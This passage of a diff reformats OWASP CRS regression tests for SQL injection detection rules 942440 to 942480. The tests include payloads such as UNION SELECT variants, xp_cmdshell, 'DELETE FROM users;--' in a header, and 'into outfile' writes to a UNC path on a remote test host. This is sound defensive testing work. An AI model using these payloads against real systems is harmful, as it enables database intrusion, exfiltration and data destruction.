"test=0/**/union/*!50000select*/table_name`foo`/**/" + output: + log_contains: id "942440" + - test_id: 16 desc: "Avoid False 
Positive on JWT (body)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "POST" - port: 80 - version: "HTTP/1.1" - uri: "/post" - data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - output: - no_log_contains: id "942440" - - test_title: 942440-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + no_log_contains: id "942440" + - test_id: 17 desc: "Avoid False Positive on JWT (cookie)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - method: "POST" - port: 80 - version: "HTTP/1.1" - uri: "/post" - data: "foo=bar" - output: - no_log_contains: id "942440" - - test_title: 942440-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "foo=bar" + output: + no_log_contains: id "942440" + - test_id: 18 desc: "Avoid False Positive on JWT (querystring)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: 
"/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - output: - no_log_contains: id "942440" - - test_title: 942440-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + no_log_contains: id "942440" + - test_id: 19 desc: "False positive against Facebook click identifier" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" - output: - no_log_contains: id "942440" - - test_title: 942440-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" + output: + no_log_contains: id "942440" + - test_id: 20 desc: "False positive against Google click identifier" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" - output: - no_log_contains: id "942440" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" + output: + no_log_contains: id "942440" 
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml index 7d3203112..7d86d5a89 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml 
@@ -2,91 +2,84 @@ meta: author: "William Woodson, azurit" description: None - enabled: true - name: 942450.yaml tests: - - test_title: 942450-1 + - test_id: 1 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=%5c0xf00dsdfdsa" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-2 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=%5c0xf00dsdfdsa" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_id: 2 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-3 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_id: 3 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=select%200x616263" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-4 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=select%200x616263" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_id: 4 desc: "SQL Hex Encoding - negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=IHRlc3Q0xAcF" - version: HTTP/1.0 - output: - no_log_contains: id "942450" - - test_title: 942450-5 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=IHRlc3Q0xAcF" + version: HTTP/1.0 + output: + no_log_contains: id "942450" + - test_id: 5 desc: "SQL Hex Encoding - negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" - version: HTTP/1.0 - output: - no_log_contains: id "942450" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" + version: HTTP/1.0 + output: + no_log_contains: id "942450" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml index 7d99328e2..7ce8f78c5 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml 
@@ -2,40 +2,36 @@ meta: author: "Franziska Bühler, azurit" description: None - enabled: true - name: 942460.yaml tests: - - test_title: 942460-1 + - test_id: 1 desc: "Repetitive Non-Word Characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=foo...." - version: HTTP/1.1 - output: - log_contains: id "942460" - - test_title: 942460-2 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=foo...." + version: HTTP/1.1 + output: + log_contains: id "942460" + - test_id: 2 desc: "Repetitive Non-Word Characters negative test only 3 characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=foo..." - version: HTTP/1.1 - output: - no_log_contains: id "942460" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=foo..." + version: HTTP/1.1 + output: + no_log_contains: id "942460" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml index e2b679c1a..894edcb3e 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml 
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml 
@@ -2,192 +2,179 @@ meta: author: "Christoph Hansen, azurit" description: None - enabled: true - name: 942470.yaml tests: - - test_title: 942470-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=nvarchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=nvarchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 2 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_cmdshell" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_cmdshell" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 3 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=varchar" - version: 
HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=varchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 4 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_dirtree" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_dirtree" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 5 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_regread" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_regread" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 6 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sp_password" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sp_password" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 7 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UTL_HTTP" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UTL_HTTP" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 8 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=OPENROWSET" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=OPENROWSET" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 9 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 10 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 11 desc: "SQL Injection Attack: current_user" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=1%2bcurrent_user::int" - version: HTTP/1.0 - output: - log_contains: id "942470" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=1%2bcurrent_user::int" + version: HTTP/1.0 + output: + log_contains: id "942470" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml index af47b1574..e0b642eec 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml 
@@ -2,210 +2,209 @@ meta: author: "Jose Nazario, azurit" description: None - enabled: true - name: 942480.yaml tests: - - test_title: 942480-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # variable name boundary attacks + uri: "/?'msdasql'" + version: HTTP/1.0 + output: + log_contains: "id \"942480" + - test_id: 2 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" # variable name boundary attacks uri: "/get?'msdasql'" version: HTTP/1.0 output: log_contains: "id \"942480" - - test_title: 942480-2 + - test_id: 2 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - # variable name boundary attacks - Cookie: "'msdasql'" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: "id \"942480" - - test_title: 942480-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + # variable name boundary attacks + Cookie: "'msdasql'" + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log_contains: "id \"942480" + - test_id: 3 desc: "Data dump using 'into outfile'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 4 desc: "Data dump using 'into outfile'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/config.ini' into outfile 
'\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 5 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=0.3480567293179807' UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=0.3480567293179807' UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 6 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=config.ini\") UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=config.ini\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 7 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=CRS) UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=CRS) UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 8 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=CRS3\") UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=CRS3\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 9 desc: "SQL injection using 'overlay(...placing..)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 
"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 10 desc: "SQL injection in User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: DELETE FROM users;-- - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: DELETE FROM users;-- + Accept: 